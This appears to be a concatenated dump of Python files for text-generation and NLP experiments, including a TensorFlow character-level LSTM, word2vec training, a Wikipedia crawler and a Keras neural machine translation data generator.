# Add dropout to the cell outputs
drop_lstm = tf.contrib.rnn.DropoutWrapper(lstm, output_keep_prob=keep_prob)
return drop_lstm
# Stack up multiple LSTM layers, for deep learning
# build num_layers layers of lstm_size LSTM Cells
cell = tf.contrib.rnn.MultiRNNCell([build_cell() for _ in range(num_layers)])
initial_state = cell.zero_state(batch_size, tf.float32)
return cell, initial_state
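# Note (TF 1.x behaviour, stated here as an assumption): MultiRNNCell stacks
# num_layers independent LSTM cells, and cell.zero_state(batch_size, tf.float32)
# returns a tuple of num_layers LSTMStateTuple(c, h) pairs, each of shape
# (batch_size, lstm_size). For example, with num_layers=2, batch_size=64 and
# lstm_size=128, initial_state holds four tensors of shape (64, 128).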
def build_output(lstm_output, in_size, out_size):
''' Build a softmax layer, return the softmax output and logits.
Arguments
---------
lstm_output: List of output tensors from the LSTM layer
in_size: Size of the input tensor, for example, size of the LSTM cells
out_size: Size of this softmax layer
'''
# Reshape output so it's a bunch of rows, one row for each step for each sequence.
# Concatenate lstm_output over axis 1 (the columns)
seq_output = tf.concat(lstm_output, axis=1)
# Reshape seq_output to a 2D tensor with lstm_size columns
x = tf.reshape(seq_output, (-1, in_size))
# Connect the RNN outputs to a softmax layer
with tf.variable_scope('softmax'):
# Create the weight and bias variables here
softmax_w = tf.Variable(tf.truncated_normal((in_size, out_size), stddev=0.1))
softmax_b = tf.Variable(tf.zeros(out_size))
# Since output is a bunch of rows of RNN cell outputs, logits will be a bunch
# of rows of logit outputs, one for each step and sequence
logits = tf.matmul(x, softmax_w) + softmax_b
# Use softmax to get the probabilities for predicted characters
out = tf.nn.softmax(logits, name="predictions")
return out, logits
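# Shape sketch (illustrative): if the RNN output has shape
# (batch_size, num_steps, lstm_size), the reshape flattens it to
# (batch_size * num_steps, lstm_size); the softmax layer then produces logits
# and probabilities of shape (batch_size * num_steps, out_size), i.e. one row
# of character probabilities per time step per sequence.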
def build_loss(logits, targets, num_classes):
''' Calculate the loss from the logits and the targets.
Arguments
---------
logits: Logits from final fully connected layer
targets: Targets for supervised learning
num_classes: Number of classes in targets
'''
# One-hot encode targets and reshape to match logits, one row per sequence per step
y_one_hot = tf.one_hot(targets, num_classes)
y_reshaped = tf.reshape(y_one_hot, logits.get_shape())
# Softmax cross entropy loss
loss = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=y_reshaped)
loss = tf.reduce_mean(loss)
return loss
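# Shape sketch (illustrative): targets of shape (batch_size, num_steps) are
# one-hot encoded to (batch_size, num_steps, num_classes) and reshaped to match
# the flattened logits, (batch_size * num_steps, num_classes), before the
# per-row softmax cross entropy is averaged into a single scalar loss.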
def build_optimizer(loss, learning_rate, grad_clip):
''' Build the optimizer for training, using gradient clipping.
Arguments:
loss: Network loss
learning_rate: Learning rate for optimizer
grad_clip: Threshold for clipping gradients to keep them from exploding
'''
# Optimizer for training, using gradient clipping to control exploding gradients
tvars = tf.trainable_variables()
grads, _ = tf.clip_by_global_norm(tf.gradients(loss, tvars), grad_clip)
train_op = tf.train.AdamOptimizer(learning_rate)
optimizer = train_op.apply_gradients(zip(grads, tvars))
return optimizer
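# Minimal sketch of the clipping step (assuming a built graph):
# tf.clip_by_global_norm rescales the whole gradient list so that its global
# norm is at most grad_clip, e.g. a global norm of 50 with grad_clip=5 scales
# every gradient by 0.1 before AdamOptimizer applies the updates.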
class CharRNN:
def __init__(self, num_classes, batch_size=64, num_steps=50,
lstm_size=128, num_layers=2, learning_rate=0.001,
grad_clip=5, sampling=False):
# When we're using this network for sampling later, we'll be passing in
# one character at a time, so providing an option for that
if sampling:
batch_size, num_steps = 1, 1
else:
batch_size, num_steps = batch_size, num_steps
tf.reset_default_graph()
# Build the input placeholder tensors
self.inputs, self.targets, self.keep_prob = build_inputs(batch_size, num_steps)
# Build the LSTM cell
# (lstm_size, num_layers, batch_size, keep_prob)
cell, self.initial_state = build_lstm(lstm_size, num_layers, batch_size, self.keep_prob)
### Run the data through the RNN layers
# First, one-hot encode the input tokens
x_one_hot = tf.one_hot(self.inputs, num_classes)
# Run each sequence step through the RNN with tf.nn.dynamic_rnn
outputs, state = tf.nn.dynamic_rnn(cell, x_one_hot, initial_state=self.initial_state)
self.final_state = state
# Get softmax predictions and logits
# (lstm_output, in_size, out_size)
# The hidden layers have lstm_size nodes each, and the output layer has
# num_classes units (one per character in the vocabulary)
self.prediction, self.logits = build_output(outputs, lstm_size, num_classes)
# Loss and optimizer (with gradient clipping)
# (logits, targets, lstm_size, num_classes)
self.loss = build_loss(self.logits, self.targets, num_classes)
# (loss, learning_rate, grad_clip)
self.optimizer = build_optimizer(self.loss, learning_rate, grad_clip)
from time import perf_counter
from collections import namedtuple
from parameters import *
from train import *
from utils import get_time, get_text
import tqdm
import numpy as np
import os
import string
import tensorflow as tf
if __name__ == "__main__":
CHECKPOINT = "checkpoints"
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2char, char2int, text = get_text(char_level=True,
files=["E:\\datasets\\python_code_small.py", "E:\\datasets\\my_python_code.py"],
load=False,
lower=False,
save_index=4)
print(char2int)
encoded = np.array([char2int[c] for c in text])
print("[*] Total characters :", len(text))
print("[*] Number of classes :", len(vocab))
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
saver.restore(sess, f'{CHECKPOINT}/e13_l256.ckpt')
total_steps = len(encoded) // batch_size // num_steps
for e in range(14, epochs):
# Train network
cs = 0
new_state = sess.run(model.initial_state)
min_loss = np.inf
batches = tqdm.tqdm(get_batches(encoded, batch_size, num_steps),
f"Epoch= {e+1}/{epochs} - {cs}/{total_steps}",
total=total_steps)
for x, y in batches:
cs += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
batches.set_description(f"Epoch: {e+1}/{epochs} - {cs}/{total_steps} loss:{batch_loss:.2f}")
saver.save(sess, f"{CHECKPOINT}/e{e}_l{lstm_size}.ckpt")
print("Loss:", batch_loss)
saver.save(sess, f"{CHECKPOINT}/i{cs}_l{lstm_size}.ckpt")
from time import perf_counter
from collections import namedtuple
from colorama import Fore, init
# local
from parameters import *
from train import *
from utils import get_time, get_text
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
import numpy as np
import os
import tensorflow as tf
import string
CHECKPOINT = "checkpoints_words"
files = ["carroll-alice.txt", "text.txt", "text8.txt"]
if not os.path.isdir(CHECKPOINT):
os.mkdir(CHECKPOINT)
vocab, int2word, word2int, text = get_text("data", files=files)
encoded = np.array([word2int[w] for w in text])
del text
if __name__ == "__main__":
def calculate_time():
global time_took
global start
global total_time_took
global times_took
global avg_time_took
global time_estimated
global total_steps
time_took = perf_counter() - start
total_time_took += time_took
times_took.append(time_took)
avg_time_took = sum(times_took) / len(times_took)
time_estimated = total_steps * avg_time_took - total_time_took
model = CharRNN(num_classes=len(vocab), batch_size=batch_size, num_steps=num_steps,
lstm_size=lstm_size, num_layers=num_layers,
learning_rate=learning_rate)
saver = tf.train.Saver(max_to_keep=100)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=NUM_THREADS)) as sess:
sess.run(tf.global_variables_initializer())
# Use the line below to load a checkpoint and resume training
# saver.restore(sess, f'{CHECKPOINT}/i3524_l128_loss=1.36.ckpt')
# calculate total steps
total_steps = epochs * len(encoded) / (batch_size * num_steps)
time_estimated = "N/A"
times_took = []
total_time_took = 0
current_steps = 0
progress_percentage = 0
for e in range(epochs):
# Train network
new_state = sess.run(model.initial_state)
min_loss = np.inf
for x, y in get_batches(encoded, batch_size, num_steps):
current_steps += 1
start = perf_counter()
feed = {model.inputs: x,
model.targets: y,
model.keep_prob: keep_prob,
model.initial_state: new_state}
batch_loss, new_state, _ = sess.run([model.loss,
model.final_state,
model.optimizer],
feed_dict=feed)
progress_percentage = current_steps * 100 / total_steps
if batch_loss < min_loss:
# saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}_loss={batch_loss:.2f}.ckpt")
min_loss = batch_loss
calculate_time()
print(f'{GREEN}[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}{RESET}')
continue
if (current_steps % print_every_n == 0):
calculate_time()
print(f'[{progress_percentage:.2f}%] Epoch: {e+1:3}/{epochs} Training loss: {batch_loss:2.4f} - {time_took:2.4f} s/batch - ETA: {get_time(time_estimated)}', end='\r')
if (current_steps % save_every_n == 0):
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
saver.save(sess, f"{CHECKPOINT}/i{current_steps}_l{lstm_size}.ckpt")
import tqdm
import os
import inflect
import glob
import pickle
import sys
from string import punctuation, whitespace
p = inflect.engine()
UNK = "<unk>"
char2int_target = {'\t': 0, '\n': 1, '\x0c': 2, ' ': 3, '!': 4, '"': 5, '#': 6, '$': 7, '%': 8, '&': 9, "'": 10, '(': 11, ')': 12, '*': 13, '+': 14, ',': 15, '-': 16, '.': 17,
'/': 18, '0': 19, '1': 20, '2': 21, '3': 22, '4': 23, '5': 24, '6': 25, '7': 26, '8': 27, '9': 28, ':': 29, ';': 30, '<': 31, '=': 32, '>': 33, '?': 34, '@':
35, 'A': 36, 'B': 37, 'C': 38, 'D': 39, 'E': 40, 'F': 41, 'G': 42, 'H': 43, 'I': 44, 'J': 45, 'K': 46, 'L': 47, 'M': 48, 'N': 49, 'O': 50, 'P': 51, 'Q': 52, 'R': 53, 'S': 54, 'T': 55, 'U': 56, 'V': 57, 'W': 58, 'X': 59, 'Y': 60, 'Z': 61, '[': 62, '\\': 63, ']': 64, '^': 65, '_': 66, '`': 67, 'a': 68, 'b': 69, 'c':
70, 'd': 71, 'e': 72, 'f': 73, 'g': 74, 'h': 75, 'i': 76, 'j': 77, 'k': 78, 'l': 79, 'm': 80, 'n': 81, 'o': 82, 'p': 83, 'q': 84, 'r': 85, 's': 86, 't': 87, 'u': 88, 'v': 89, 'w': 90, 'x': 91, 'y': 92, 'z': 93, '{': 94, '|': 95, '}': 96, '': 97, '': 98, '': 99, '': 100, '': 101, '': 102, '': 103, '': 104, '': 105, '\xad': 106, '': 107, '': 108, '': 109, '': 110, '': 111, '': 112, '': 113, '': 114, '': 115, '': 116, '': 117, '': 118, '': 119, '': 120, '': 121, '': 122, '': 123, '': 124, '': 125, '': 126, '': 127, '': 128, '': 129, '': 130, '': 131, '': 132, '': 133, '': 134, '': 135, '': 136, '': 137, '': 138, '': 139, '': 140, '': 141, '': 142, '': 143, '': 144, '': 145, '': 146, '': 147, '': 148, '': 149, '': 150, '': 151, '': 152, '': 153, '': 154, '': 155, '': 156, '': 157, '': 158, '': 159, '': 160, '': 161, '': 162, '': 163, '': 164, '': 165, '': 166, '': 167,
'': 168, '': 169, '': 170, '': 171, '': 172, '': 173, '': 174, '': 175, '': 176, '': 177, '': 178, '': 179, '': 180, '': 181, '': 182, '': 183, '': 184, '': 185, '': 186, '': 187, '': 188, '': 189, '': 190, '': 191, '': 192}
def get_time(seconds, form="{hours:02}:{minutes:02}:{seconds:02}"):
try:
seconds = int(seconds)
except:
return seconds
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
months, days = divmod(days, 30)
years, months = divmod(months, 12)
if days:
form = "{days}d " + form
if months:
form = "{months}m " + form
if years:
form = "{years}y " + form
return form.format(**locals())
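# Usage sketch (illustrative values):
# get_time(3675)   -> "01:01:15"
# get_time(90061)  -> "1d 01:01:01"
# get_time("N/A")  -> "N/A"   (non-numeric input is returned unchanged)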
def get_text(path="data",
files=["carroll-alice.txt", "text.txt", "text8.txt"],
load=True,
char_level=False,
lower=True,
save=True,
save_index=1):
if load:
# check if any pre-cleaned saved data exists first
pickle_files = glob.glob(os.path.join(path, "text_data*.pickle"))
if len(pickle_files) == 1:
return pickle.load(open(pickle_files[0], "rb"))
elif len(pickle_files) > 1:
sizes = [ get_size(os.path.getsize(p)) for p in pickle_files ]
s = ""
for i, (file, size) in enumerate(zip(pickle_files, sizes), start=1):
s += str(i) + " - " + os.path.basename(file) + f" ({size}) \n"
choice = int(input(f"""Multiple data corpus found:
{s}
99 - use and clean .txt files
Please choose one: """))
if choice != 99:
chosen_file = pickle_files[choice-1]
print("[*] Loading pickled data...")
return pickle.load(open(chosen_file, "rb"))
text = ""
for file in tqdm.tqdm(files, "Loading data"):
file = os.path.join(path, file)
with open(file) as f:
if lower:
text += f.read().lower()
else:
text += f.read()
print(len(text))
punc = set(punctuation)
# text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c not in punc ])
text = ''.join([ c for c in tqdm.tqdm(text, "Cleaning text") if c in char2int_target ])
# for ws in whitespace:
# text = text.replace(ws, " ")
if char_level:
text = list(text)
else:
text = text.split()
# new_text = []
new_text = text
# append = new_text.append
# co = 0
# if char_level:
# k = 0
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# if not text[i].isdigit():
# append(text[i])
# k = 0
# else:
# # if this digit is mapped to a word already using
# # the below method, then just continue
# if k >= 1:
# k -= 1
# continue
# # if there are more digits following this character
# # k = 0
# digits = ""
# while text[i+k].isdigit():
# digits += text[i+k]
# k += 1
# w = p.number_to_words(digits).replace("-", " ").replace(",", "")
# for c in w:
# append(c)
# co += 1
# else:
# for i in tqdm.tqdm(range(len(text)), "Normalizing words"):
# # convert digits to words
# # (i.e '7' to 'seven')
# if text[i].isdigit():
# text[i] = p.number_to_words(text[i]).replace("-", " ")
# append(text[i])
# co += 1
# else:
# append(text[i])
vocab = sorted(set(new_text))
print(f"alices in vocab:", "alices" in vocab)
# print(f"Converted {co} digits to words.")
print(f"Total vocabulary size:", len(vocab))
int2word = { i:w for i, w in enumerate(vocab) }
word2int = { w:i for i, w in enumerate(vocab) }
if save:
pickle_filename = os.path.join(path, f"text_data_{save_index}.pickle")
print("Pickling data for future use to", pickle_filename)
pickle.dump((vocab, int2word, word2int, new_text), open(pickle_filename, "wb"))
return vocab, int2word, word2int, new_text
def get_size(size, suffix="B"):
factor = 1024
for unit in ['', 'K', 'M', 'G', 'T', 'P']:
if size < factor:
return "{:.2f}{}{}".format(size, unit, suffix)
size /= factor
return "{:.2f}{}{}".format(size, "E", suffix)
import wikipedia
from threading import Thread
def gather(page_name):
print(f"Crawling {page_name}")
page = wikipedia.page(page_name)
filename = page_name.replace(" ", "_")
print(page.content, file=open(f"data/{filename}.txt", 'w', encoding="utf-8"))
print(f"Done crawling {page_name}")
for i in range(5):
Thread(target=gather, args=(page.links[i],)).start()
if __name__ == "__main__":
pages = ["Relativity"]
for page in pages:
gather(page)
# from keras.preprocessing.text import Tokenizer
from utils import chunk_seq
from collections import Counter
from nltk.corpus import stopwords
from keras.preprocessing.sequence import pad_sequences
import numpy as np
import gensim
sequence_length = 200
embedding_dim = 200
# window_size = 7
# vector_dim = 300
# epochs = 1000
# valid_size = 16 # Random set of words to evaluate similarity on.
# valid_window = 100 # Only pick dev samples in the head of the distribution.
# valid_examples = np.random.choice(valid_window, valid_size, replace=False)
with open("data/quran_cleaned.txt", encoding="utf8") as f:
text = f.read()
# print(text[:500])
ayat = text.split(".")
words = []
for ayah in ayat:
words.append(ayah.split())
# print(words[:5])
# stop words
stop_words = stopwords.words("arabic")
# most common come at the top
# vocab = [ w[0] for w in Counter(words).most_common() if w[0] not in stop_words]
# words = [ word for word in words if word not in stop_words]
new_words = []
for ayah in words:
new_words.append([ w for w in ayah if w not in stop_words])
# print(len(vocab))
# n = len(words) / sequence_length
# # split text to n sequences
# print(words[:10])
# words = chunk_seq(words, len(ayat))
vocab = []
for ayah in new_words:
for w in ayah:
vocab.append(w)
vocab = sorted(set(vocab))
vocab2int = {w: i for i, w in enumerate(vocab, start=1)}
int2vocab = {i: w for i, w in enumerate(vocab, start=1)}
encoded_words = []
for ayah in new_words:
encoded_words.append([ vocab2int[w] for w in ayah ])
encoded_words = pad_sequences(encoded_words)
# print(encoded_words[10])
words = []
for seq in encoded_words:
words.append([ int2vocab[w] if w != 0 else "_unk_" for w in seq ])
# print(words[:5])
# # define model
print("Training Word2Vec Model...")
model = gensim.models.Word2Vec(sentences=words, size=embedding_dim, workers=7, min_count=1, window=6)
path_to_save = r"E:\datasets\word2vec_quran.txt"
print("Saving model...")
model.wv.save_word2vec_format(path_to_save, binary=False)
# print(dir(model))
from keras.layers import Embedding, LSTM, Dense, Activation, BatchNormalization
from keras.layers import Flatten
from keras.models import Sequential
from preprocess import words, vocab, sequence_length, sequences, vector_dim
from preprocess import window_size
model = Sequential()
model.add(Embedding(len(vocab), vector_dim, input_length=sequence_length))
model.add(Flatten())
model.add(Dense(1))
model.compile("adam", "binary_crossentropy")
model.fit()
def chunk_seq(seq, num):
avg = len(seq) / float(num)
out = []
last = 0.0
while last < len(seq):
out.append(seq[int(last):int(last + avg)])
last += avg
return out
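# Usage sketch (illustrative): chunk_seq splits a sequence into num roughly
# equal parts using a floating-point stride, so the last chunk absorbs any
# rounding remainder:
# chunk_seq(list(range(10)), 3)  # -> [[0, 1, 2], [3, 4, 5], [6, 7, 8, 9]]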
def encode_words(words, vocab2int):
# encoded = [ vocab2int[word] for word in words ]
encoded = []
append = encoded.append
for word in words:
c = vocab2int.get(word)
if c:
append(c)
return encoded
def remove_stop_words(vocab):
# remove stop words
vocab.remove("the")
vocab.remove("of")
vocab.remove("and")
vocab.remove("in")
vocab.remove("a")
vocab.remove("to")
vocab.remove("is")
vocab.remove("as")
vocab.remove("for")
# encoding: utf-8
"""
author: BrikerMan
contact: eliyar917@gmail.com
blog: https://eliyar.biz
version: 1.0
license: Apache Licence
file: w2v_visualizer.py
time: 2017/7/30 9:37
"""
import sys
import os
import pathlib
import numpy as np
from gensim.models.keyedvectors import KeyedVectors
import tensorflow as tf
from tensorflow.contrib.tensorboard.plugins import projector
def visualize(model, output_path):
meta_file = "w2x_metadata.tsv"
placeholder = np.zeros((len(model.wv.index2word), model.vector_size))
with open(os.path.join(output_path, meta_file), 'wb') as file_metadata:
for i, word in enumerate(model.wv.index2word):
placeholder[i] = model[word]
# temporary solution for https://github.com/tensorflow/tensorflow/issues/9094
if word == '':
print("Emply Line, should replecaed by any thing else, or will cause a bug of tensorboard")
file_metadata.write("{0}".format('<Empty Line>').encode('utf-8') + b'\n')
else:
file_metadata.write("{0}".format(word).encode('utf-8') + b'\n')
# define the model without training
sess = tf.InteractiveSession()
embedding = tf.Variable(placeholder, trainable=False, name='w2x_metadata')
tf.global_variables_initializer().run()
saver = tf.train.Saver()
writer = tf.summary.FileWriter(output_path, sess.graph)
# adding into projector
config = projector.ProjectorConfig()
embed = config.embeddings.add()
embed.tensor_name = 'w2x_metadata'
embed.metadata_path = meta_file
# Specify the width and height of a single thumbnail.
projector.visualize_embeddings(writer, config)
saver.save(sess, os.path.join(output_path, 'w2x_metadata.ckpt'))
print('Run "tensorboard --logdir={0}" to visualize the result in TensorBoard'.format(output_path))
if __name__ == "__main__":
"""
Use model.save_word2vec_format to save w2v_model in word2vec format
Then just run python w2v_visualizer.py word2vec.text visualize_result
"""
try:
model_path = sys.argv[1]
output_path = sys.argv[2]
except IndexError:
print("Please provide model path and output path")
sys.exit(1)
model = KeyedVectors.load_word2vec_format(model_path)
pathlib.Path(output_path).mkdir(parents=True, exist_ok=True)
visualize(model, output_path)
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.utils import to_categorical
import numpy as np
import pickle
import tqdm
class NMTGenerator:
"""A class utility for generating Neural-Machine-Translation large datasets"""
def __init__(self, source_file, target_file, num_encoder_tokens=None, num_decoder_tokens=None,
source_sequence_length=None, target_sequence_length=None, x_tk=None, y_tk=None,
batch_size=256, validation_split=0.15, load_tokenizers=False, dump_tokenizers=True,
same_tokenizer=False, char_level=False, verbose=0):
self.source_file = source_file
self.target_file = target_file
self.same_tokenizer = same_tokenizer
self.char_level = char_level
if not load_tokenizers:
# x ( source ) tokenizer
self.x_tk = x_tk if x_tk else Tokenizer(char_level=self.char_level)
# y ( target ) tokenizer
self.y_tk = y_tk if y_tk else Tokenizer(char_level=self.char_level)
else:
self.x_tk = pickle.load(open("results/x_tk.pickle", "rb"))
self.y_tk = pickle.load(open("results/y_tk.pickle", "rb"))
# remove '?' and '_' from filters
# which means include them in vocabulary
# add "'" to filters
self.x_tk.filters = self.x_tk.filters.replace("?", "").replace("_", "") + "'"
self.y_tk.filters = self.y_tk.filters.replace("?", "").replace("_", "") + "'"
if char_level:
self.x_tk.filters = self.x_tk.filters.replace(".", "").replace(",", "")
self.y_tk.filters = self.y_tk.filters.replace(".", "").replace(",", "")
if same_tokenizer:
self.y_tk = self.x_tk
# max sequence length of source language
self.source_sequence_length = source_sequence_length
# max sequence length of target language
self.target_sequence_length = target_sequence_length
# vocab size of encoder
self.num_encoder_tokens = num_encoder_tokens
# vocab size of decoder
self.num_decoder_tokens = num_decoder_tokens
# the batch size
self.batch_size = batch_size
# the ratio which the dataset will be partitioned
self.validation_split = validation_split
# whether to dump x_tk and y_tk when finished tokenizing
self.dump_tokenizers = dump_tokenizers
# cap to remove _unk_ samples
self.n_unk_to_remove = 2
self.verbose = verbose
def load_dataset(self):
"""Loads the dataset:
1. load the data from files
2. tokenize and calculate sequence lengths and num_tokens
3. post pad the sequences"""
self.load_data()
if self.verbose:
print("[+] Data loaded")
self.tokenize()
if self.verbose:
print("[+] Text tokenized")
self.pad_sequences()
if self.verbose:
print("[+] Sequences padded")
self.split_data()
if self.verbose:
print("[+] Data splitted")
def load_data(self):
"""Loads data from files"""
self.X = load_data(self.source_file)
self.y = load_data(self.target_file)
# remove samples that contain too many unks
X, y = [], []
co = 0
for question, answer in zip(self.X, self.y):
if question.count("_unk_") >= self.n_unk_to_remove or answer.count("_unk_") >= self.n_unk_to_remove:
co += 1
else:
X.append(question)
y.append(answer)
self.X = X
self.y = y
if self.verbose >= 1:
print("[*] Number of samples:", len(self.X))
if self.verbose >= 2:
print("[!] Number of samples deleted:", co)
def tokenize(self):
"""Tokenizes sentences/strings as well as calculating input/output sequence lengths
and input/output vocab sizes"""
self.x_tk.fit_on_texts(self.X)
self.y_tk.fit_on_texts(self.y)
self.X = self.x_tk.texts_to_sequences(self.X)
self.y = self.y_tk.texts_to_sequences(self.y)
# calculate both sequence lengths ( source and target )
self.source_sequence_length = max([len(x) for x in self.X])
self.target_sequence_length = max([len(x) for x in self.y])
# calculating number of encoder/decoder vocab sizes
self.num_encoder_tokens = len(self.x_tk.index_word) + 1
self.num_decoder_tokens = len(self.y_tk.index_word) + 1
# dump tokenizers
pickle.dump(self.x_tk, open("results/x_tk.pickle", "wb"))
pickle.dump(self.y_tk, open("results/y_tk.pickle", "wb"))
def pad_sequences(self):
"""Pad sequences"""
self.X = pad_sequences(self.X, maxlen=self.source_sequence_length, padding='post')
self.y = pad_sequences(self.y, maxlen=self.target_sequence_length, padding='post')
def split_data(self):
"""split training/validation sets using self.validation_split"""
split_value = int(len(self.X)*self.validation_split)
self.X_test = self.X[:split_value]
self.X_train = self.X[split_value:]
self.y_test = self.y[:split_value]
self.y_train = self.y[split_value:]
# free up memory
del self.X
del self.y
def shuffle_data(self, train=True):
"""Shuffles X and y together
:params train (bool): whether to shuffle training data, default is True
Note that when train is False, testing data is shuffled instead."""
state = np.random.get_state()
if train:
np.random.shuffle(self.X_train)
np.random.set_state(state)
np.random.shuffle(self.y_train)
else:
np.random.shuffle(self.X_test)
np.random.set_state(state)
np.random.shuffle(self.y_test)
def next_train(self):
"""Training set generator"""
return self.generate_batches(self.X_train, self.y_train, train=True)
def next_validation(self):
"""Validation set generator"""
return self.generate_batches(self.X_test, self.y_test, train=False)
def generate_batches(self, X, y, train=True):
"""Data generator"""
same_tokenizer = self.same_tokenizer
batch_size = self.batch_size
char_level = self.char_level
source_sequence_length = self.source_sequence_length
target_sequence_length = self.target_sequence_length
if same_tokenizer:
num_encoder_tokens = max([self.num_encoder_tokens, self.num_decoder_tokens])
num_decoder_tokens = num_encoder_tokens
else:
num_encoder_tokens = self.num_encoder_tokens
num_decoder_tokens = self.num_decoder_tokens
while True:
for j in range(0, len(X), batch_size):
encoder_input_data = X[j: j+batch_size]
decoder_input_data = y[j: j+batch_size]
# update batch size ( different size in last batch of the dataset )
batch_size = encoder_input_data.shape[0]
if self.char_level:
encoder_data = np.zeros((batch_size, source_sequence_length, num_encoder_tokens))
decoder_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
else:
encoder_data = encoder_input_data
decoder_data = decoder_input_data
decoder_target_data = np.zeros((batch_size, target_sequence_length, num_decoder_tokens))
if char_level:
# if it's char level, one-hot encode all sequences of characters
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
decoder_data[i, t, word_index] = 1
for i, sequence in enumerate(encoder_input_data):
for t, word_index in enumerate(sequence):
encoder_data[i, t, word_index] = 1
else:
# if it's word level, one-hot encode only the target data ( the one compared with the dense output )
for i, sequence in enumerate(decoder_input_data):
for t, word_index in enumerate(sequence):
if t > 0:
decoder_target_data[i, t - 1, word_index] = 1
yield ([encoder_data, decoder_data], decoder_target_data)
# shuffle data when an epoch is finished
self.shuffle_data(train=train)
def get_embedding_vectors(tokenizer):
embedding_index = {}
with open("data/glove.6B.300d.txt", encoding='utf8') as f:
for line in tqdm.tqdm(f, "Reading GloVe"):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], dtype='float32')
embedding_index[word] = vectors
word_index = tokenizer.word_index
embedding_matrix = np.zeros((len(word_index)+1, 300))
for word, i in word_index.items():
embedding_vector = embedding_index.get(word)
if embedding_vector is not None:
# words not found will be 0s
embedding_matrix[i] = embedding_vector
return embedding_matrix
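# Sketch of how the returned matrix is meant to be used (assumes Keras and the
# 300-dimensional GloVe file above): row i of embedding_matrix holds the GloVe
# vector of the word whose tokenizer index is i, so it can be plugged into an
# Embedding layer as fixed weights, e.g.
# Embedding(len(tokenizer.word_index) + 1, 300,
#           weights=[get_embedding_vectors(tokenizer)], trainable=False)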
def load_data(filename):
text = []
append = text.append
with open(filename) as f:
for line in tqdm.tqdm(f, f"Reading {filename}"):
line = line.strip()
append(line)
return text
# def generate_batch(X, y, num_decoder_tokens, max_length_src, max_length_target, batch_size=256):
# """Generating data"""
# while True:
# for j in range(0, len(X), batch_size):
# encoder_input_data = np.zeros((batch_size, max_length_src), dtype='float32')
# decoder_input_data = np.zeros((batch_size, max_length_target), dtype='float32')
# decoder_target_data = np.zeros((batch_size, max_length_target, num_decoder_tokens), dtype='float32')
# for i, (input_text, target_text) in enumerate(zip(X[j: j+batch_size], y[j: j+batch_size])):
# for t, word in enumerate(input_text.split()):
# encoder_input_data[i, t] = input_word_index[word] # encoder input sequence
# for t, word in enumerate(target_text.split()):
# if t > 0:
# # offset by one timestep
# # one-hot encoded
# decoder_target_data[i, t-1, target_token_index[word]] = 1
# if t < len(target_text.split()) - 1:
# decoder_input_data[i, t] = target_token_index[word]
# yield ([encoder_input_data, decoder_input_data], decoder_target_data)
# def tokenize(x, tokenizer=None):
# """Tokenize x
# :param x: List of sentences/strings to be tokenized
# :return: Tuple of (tokenized x data, tokenizer used to tokenize x)"""
# if tokenizer:
# t = tokenizer
# else:
# t = Tokenizer()
# t.fit_on_texts(x)
# return t.texts_to_sequences(x), t
# def pad(x, length=None):
# """Pad x
# :param x: list of sequences
# :param length: Length to pad the sequence to, If None, use length
# of longest sequence in x.
# :return: Padded numpy array of sequences"""
# return pad_sequences(x, maxlen=length, padding="post")
# def preprocess(x, y):
# """Preprocess x and y
# :param x: Feature list of sentences
# :param y: Label list of sentences
# :return: Tuple of (preprocessed x, preprocessed y, x tokenizer, y tokenizer)"""
# preprocess_x, x_tk = tokenize(x)
# preprocess_y, y_tk = tokenize(y)
# preprocess_x2 = [ [0] + s for s in preprocess_y ]
# longest_x = max([len(i) for i in preprocess_x])
# longest_y = max([len(i) for i in preprocess_y]) + 1
# # max_length = len(x_tk.word_index) if len(x_tk.word_index) > len(y_tk.word_index) else len(y_tk.word_index)
# max_length = longest_x if longest_x > longest_y else longest_y
# preprocess_x = pad(preprocess_x, length=max_length)
# preprocess_x2 = pad(preprocess_x2, length=max_length)
# preprocess_y = pad(preprocess_y, length=max_length)
# # preprocess_x = to_categorical(preprocess_x)
# # preprocess_x2 = to_categorical(preprocess_x2)
# preprocess_y = to_categorical(preprocess_y)
# return preprocess_x, preprocess_x2, preprocess_y, x_tk, y_tk
from keras.layers import Embedding, TimeDistributed, Dense, GRU, LSTM, Input
from keras.models import Model, Sequential
from keras.utils import to_categorical
import numpy as np
import tqdm
def encoder_decoder_model(num_encoder_tokens, latent_dim, num_decoder_tokens, embedding_matrix=None, embedding_layer=True):
# ENCODER
# define an input sequence and process it
if embedding_layer:
encoder_inputs = Input(shape=(None,))
if embedding_matrix is None:
encoder_emb_layer = Embedding(num_encoder_tokens, latent_dim, mask_zero=True)
else:
encoder_emb_layer = Embedding(num_encoder_tokens,
latent_dim,
mask_zero=True,
weights=[embedding_matrix],
trainable=False)
encoder_emb = encoder_emb_layer(encoder_inputs)
else:
encoder_inputs = Input(shape=(None, num_encoder_tokens))
encoder_emb = encoder_inputs
encoder_lstm = LSTM(latent_dim, return_state=True)
encoder_outputs, state_h, state_c = encoder_lstm(encoder_emb)
# we discard encoder_outputs and only keep the states
